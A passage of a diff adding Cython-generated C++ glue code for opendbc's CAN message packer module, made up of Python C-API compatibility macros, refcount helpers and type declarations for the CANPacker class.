__Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "opendbc/can/packer_pyx.pyx", + "", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* #### Code section: numeric_typedefs ### */ +/* #### Code section: complex_type_declarations ### */ +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker; + +/* "common.pxd":10 + * + * + * ctypedef unsigned int (*calc_checksum_type)(uint32_t, const Signal&, const vector[uint8_t] &) # <<<<<<<<<<<<<< + * + * cdef extern from "common_dbc.h": + */ +typedef unsigned int (*__pyx_t_7opendbc_3can_6common_calc_checksum_type)(uint32_t, struct Signal const &, std::vector const &); + +/* "opendbc/can/packer_pyx.pyx":13 + * + * + * cdef class CANPacker: # <<<<<<<<<<<<<< + * cdef: + * cpp_CANPacker *packer + */ +struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker { + PyObject_HEAD + struct __pyx_vtabstruct_7opendbc_3can_10packer_pyx_CANPacker *__pyx_vtab; + CANPacker *packer; + struct DBC const *dbc; + std::map name_to_address; +}; + + + +struct __pyx_vtabstruct_7opendbc_3can_10packer_pyx_CANPacker { + std::vector (*pack)(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *, PyObject *, PyObject *); + PyObject *(*make_can_msg)(struct __pyx_obj_7opendbc_3can_10packer_pyx_CANPacker *, PyObject *, PyObject *, PyObject *, int __pyx_skip_dispatch); +}; +static struct __pyx_vtabstruct_7opendbc_3can_10packer_pyx_CANPacker *__pyx_vtabptr_7opendbc_3can_10packer_pyx_CANPacker; +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* PyErrExceptionMatches.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_ExceptionMatches(err) __Pyx_PyErr_ExceptionMatchesInState(__pyx_tstate, err) +static CYTHON_INLINE int __Pyx_PyErr_ExceptionMatchesInState(PyThreadState* tstate, PyObject* err); +#else +#define __Pyx_PyErr_ExceptionMatches(err) PyErr_ExceptionMatches(err) +#endif + +/* PyThreadStateGet.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyThreadState_declare PyThreadState *__pyx_tstate; +#define __Pyx_PyThreadState_assign __pyx_tstate = __Pyx_PyThreadState_Current; +#if PY_VERSION_HEX >= 0x030C00A6 +#define __Pyx_PyErr_Occurred() (__pyx_tstate->current_exception != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->current_exception ? (PyObject*) Py_TYPE(__pyx_tstate->current_exception) : (PyObject*) NULL) +#else +#define __Pyx_PyErr_Occurred() (__pyx_tstate->curexc_type != NULL) +#define __Pyx_PyErr_CurrentExceptionType() (__pyx_tstate->curexc_type) +#endif +#else +#define __Pyx_PyThreadState_declare +#define __Pyx_PyThreadState_assign +#define __Pyx_PyErr_Occurred() (PyErr_Occurred() != NULL) +#define __Pyx_PyErr_CurrentExceptionType() PyErr_Occurred() +#endif + +/* PyErrFetchRestore.proto */ +#if CYTHON_FAST_THREAD_STATE +#define __Pyx_PyErr_Clear() __Pyx_ErrRestore(NULL, NULL, NULL) +#define __Pyx_ErrRestoreWithState(type, value, tb) __Pyx_ErrRestoreInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) __Pyx_ErrFetchInState(PyThreadState_GET(), type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) __Pyx_ErrRestoreInState(__pyx_tstate, type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) __Pyx_ErrFetchInState(__pyx_tstate, type, value, tb) +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb); +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb); +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A6 +#define __Pyx_PyErr_SetNone(exc) (Py_INCREF(exc), __Pyx_ErrRestore((exc), NULL, NULL)) +#else +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#endif +#else +#define __Pyx_PyErr_Clear() PyErr_Clear() +#define __Pyx_PyErr_SetNone(exc) PyErr_SetNone(exc) +#define __Pyx_ErrRestoreWithState(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchWithState(type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestoreInState(tstate, type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetchInState(tstate, type, value, tb) PyErr_Fetch(type, value, tb) +#define __Pyx_ErrRestore(type, value, tb) PyErr_Restore(type, value, tb) +#define __Pyx_ErrFetch(type, value, tb) PyErr_Fetch(type, value, tb) +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyObjectGetAttrStrNoError.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name); + +/* GetBuiltinName.proto */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name); + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* MoveIfSupported.proto */ +#if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + #include + #define __PYX_STD_MOVE_IF_SUPPORTED(x) std::move(x) +#else + #define __PYX_STD_MOVE_IF_SUPPORTED(x) x +#endif + +/* PyObjectFormatSimple.proto */ +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#elif PY_MAJOR_VERSION < 3 + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyString_CheckExact(s)) ? PyUnicode_FromEncodedObject(s, NULL, "strict") :\ + PyObject_Format(s, f)) +#elif CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + likely(PyLong_CheckExact(s)) ? PyLong_Type.tp_repr(s) :\ + likely(PyFloat_CheckExact(s)) ? PyFloat_Type.tp_repr(s) :\ + PyObject_Format(s, f)) +#else + #define __Pyx_PyObject_FormatSimple(s, f) (\ + likely(PyUnicode_CheckExact(s)) ? (Py_INCREF(s), s) :\ + PyObject_Format(s, f)) +#endif + +/* PyFunctionFastCall.proto */ +#if CYTHON_FAST_PYCALL +#if !CYTHON_VECTORCALL +#define __Pyx_PyFunction_FastCall(func, args, nargs)\ + __Pyx_PyFunction_FastCallDict((func), (args), (nargs), NULL) +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs); +#endif +#define __Pyx_BUILD_ASSERT_EXPR(cond)\ + (sizeof(char [1 - 2*!(cond)]) - 1) +#ifndef Py_MEMBER_SIZE +#define Py_MEMBER_SIZE(type, member) sizeof(((type *)0)->member) +#endif +#if !CYTHON_VECTORCALL +#if PY_VERSION_HEX >= 0x03080000 + #include "frameobject.h" +#if PY_VERSION_HEX >= 0x030b00a6 + #ifndef Py_BUILD_CORE + #define Py_BUILD_CORE 1 + #endif + #include "internal/pycore_frame.h" +#endif + #define __Pxy_PyFrame_Initialize_Offsets() + #define __Pyx_PyFrame_GetLocalsplus(frame) ((frame)->f_localsplus) +#else + static size_t __pyx_pyframe_localsplus_offset = 0; + #include "frameobject.h" + #define __Pxy_PyFrame_Initialize_Offsets()\ + ((void)__Pyx_BUILD_ASSERT_EXPR(sizeof(PyFrameObject) == offsetof(PyFrameObject, f_localsplus) + Py_MEMBER_SIZE(PyFrameObject, f_localsplus)),\ + (void)(__pyx_pyframe_localsplus_offset = ((size_t)PyFrame_Type.tp_basicsize) - Py_MEMBER_SIZE(PyFrameObject, f_localsplus))) + #define __Pyx_PyFrame_GetLocalsplus(frame)\ + (assert(__pyx_pyframe_localsplus_offset), (PyObject **)(((char *)(frame)) + __pyx_pyframe_localsplus_offset)) +#endif +#endif +#endif + +/* PyObjectCall.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw); +#else +#define __Pyx_PyObject_Call(func, arg, kw) PyObject_Call(func, arg, kw) +#endif + +/* PyObjectCallMethO.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg); +#endif + +/* PyObjectFastCall.proto */ +#define __Pyx_PyObject_FastCall(func, args, nargs) __Pyx_PyObject_FastCallDict(func, args, (size_t)(nargs), NULL) +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs); + +/* PyObjectCallOneArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg); + +/* RaiseException.proto */ +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause); + +/* IterFinish.proto */ +static CYTHON_INLINE int __Pyx_IterFinish(void); + +/* PyObjectCallNoArg.proto */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func); + +/* PyObjectGetMethod.proto */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method); + +/* PyObjectCallMethod0.proto */ +static PyObject* __Pyx_PyObject_CallMethod0(PyObject* obj, PyObject* method_name); + +/* RaiseNeedMoreValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index); + +/* RaiseTooManyValuesToUnpack.proto */ +static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected); + +/* UnpackItemEndCheck.proto */ +static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected); + +/* RaiseNoneIterError.proto */ +static CYTHON_INLINE void __Pyx_RaiseNoneNotIterableError(void); + +/* UnpackTupleError.proto */ +static void __Pyx_UnpackTupleError(PyObject *, Py_ssize_t index); + +/* UnpackTuple2.proto */ +#define __Pyx_unpack_tuple2(tuple, value1, value2, is_tuple, has_known_size, decref_tuple)\ + (likely(is_tuple || PyTuple_Check(tuple)) ?\ + (likely(has_known_size || PyTuple_GET_SIZE(tuple) == 2) ?\ + __Pyx_unpack_tuple2_exact(tuple, value1, value2, decref_tuple) :\ + (__Pyx_UnpackTupleError(tuple, 2), -1)) :\ + __Pyx_unpack_tuple2_generic(tuple, value1, value2, has_known_size, decref_tuple)) +static CYTHON_INLINE int __Pyx_unpack_tuple2_exact( + PyObject* tuple, PyObject** value1, PyObject** value2, int decref_tuple); +static int __Pyx_unpack_tuple2_generic( + PyObject* tuple, PyObject** value1, PyObject** value2, int has_known_size, int decref_tuple); + +/* dict_iter.proto */ +static CYTHON_INLINE PyObject* __Pyx_dict_iterator(PyObject* dict, int is_dict, PyObject* method_name, + Py_ssize_t* p_orig_length, int* p_is_dict); +static CYTHON_INLINE int __Pyx_dict_iter_next(PyObject* dict_or_iter, Py_ssize_t orig_length, Py_ssize_t* ppos, + PyObject** pkey, PyObject** pvalue, PyObject** pitem, int is_dict); + +/* PyDictVersioning.proto */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +#define __PYX_DICT_VERSION_INIT ((PY_UINT64_T) -1) +#define __PYX_GET_DICT_VERSION(dict) (((PyDictObject*)(dict))->ma_version_tag) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var)\ + (version_var) = __PYX_GET_DICT_VERSION(dict);\ + (cache_var) = (value); +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) {\ + static PY_UINT64_T __pyx_dict_version = 0;\ + static PyObject *__pyx_dict_cached_value = NULL;\ + if (likely(__PYX_GET_DICT_VERSION(DICT) == __pyx_dict_version)) {\ + (VAR) = __pyx_dict_cached_value;\ + } else {\ + (VAR) = __pyx_dict_cached_value = (LOOKUP);\ + __pyx_dict_version = __PYX_GET_DICT_VERSION(DICT);\ + }\ +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj); +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj); +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version); +#else +#define __PYX_GET_DICT_VERSION(dict) (0) +#define __PYX_UPDATE_DICT_CACHE(dict, value, cache_var, version_var) +#define __PYX_PY_DICT_LOOKUP_IF_MODIFIED(VAR, DICT, LOOKUP) (VAR) = (LOOKUP); +#endif + +/* KeywordStringCheck.proto */ +static int __Pyx_CheckKeywordStrings(PyObject *kw, const char* function_name, int kw_allowed); + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* ValidateBasesTuple.proto */ +#if CYTHON_COMPILING_IN_CPYTHON || CYTHON_COMPILING_IN_LIMITED_API || CYTHON_USE_TYPE_SPECS +static int __Pyx_validate_bases_tuple(const char *type_name, Py_ssize_t dictoffset, PyObject *bases); +#endif + +/* PyType_Ready.proto */ +CYTHON_UNUSED static int __Pyx_PyType_Ready(PyTypeObject *t); + +/* PyObject_GenericGetAttrNoDict.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static CYTHON_INLINE PyObject* __Pyx_PyObject_GenericGetAttrNoDict(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttrNoDict PyObject_GenericGetAttr +#endif + +/* PyObject_GenericGetAttr.proto */ +#if CYTHON_USE_TYPE_SLOTS && CYTHON_USE_PYTYPE_LOOKUP && PY_VERSION_HEX < 0x03070000 +static PyObject* __Pyx_PyObject_GenericGetAttr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GenericGetAttr PyObject_GenericGetAttr +#endif + +/* SetVTable.proto */ +static int __Pyx_SetVtable(PyTypeObject* typeptr , void* vtable); + +/* GetVTable.proto */ +static void* __Pyx_GetVtable(PyTypeObject *type); + +/* MergeVTables.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_MergeVtables(PyTypeObject *type); +#endif + +/* SetupReduce.proto */ +#if !CYTHON_COMPILING_IN_LIMITED_API +static int __Pyx_setup_reduce(PyObject* type_obj); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE 